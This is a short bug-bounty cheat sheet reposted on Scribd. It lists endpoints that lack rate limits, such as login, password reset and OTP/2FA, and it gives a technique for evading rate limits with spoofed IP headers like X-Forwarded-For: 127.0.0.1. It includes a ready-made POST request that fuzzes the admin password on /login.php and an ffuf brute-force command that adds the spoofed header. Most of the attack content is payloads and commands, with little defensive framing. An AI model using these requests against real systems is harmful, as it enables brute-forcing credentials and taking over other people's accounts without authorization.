Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
4 views1 page

Rate Limit

The document outlines various areas where there is no rate limit implemented, such as login pages and password resets, which could lead to account takeovers. It also details methods to bypass rate limits by manipulating HTTP headers. Additionally, it includes an example of a POST request to exploit these vulnerabilities.

Uploaded by

francismizo77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
4 views1 page

Rate Limit

The document outlines various areas where there is no rate limit implemented, such as login pages and password resets, which could lead to account takeovers. It also details methods to bypass rate limits by manipulating HTTP headers. Additionally, it includes an example of a POST request to exploit these vulnerabilities.

Uploaded by

francismizo77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

rate limit

1- no rate limit on login page


2- no rate limit on internal password
3- no rate limit on sending reset password link
4- no rate limit on OTP or 2FA => account takeover
5- no rate limit on contact us page
6- no rate limit on comments
7- no rate limit on reports of comments
8- no rate limit on port 22

------------
bypass rate limit by adding headers
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Origination-IP: 127.0.0.1 or 0.0.0.0
X-Fowarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
------------------------------------------
POST /login.php HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Origination-IP: 127.0.0.1 or 0.0.0.0
X-Fowarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

username=admin&password=$fuzz$
-------------------------------------------
429 => 403
bypass rate limit

ffuf -u https://example.com -w wordlist.txt --data "username=admin&password=FUZZ"


-H "X-Forwarded-For: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1"

You might also like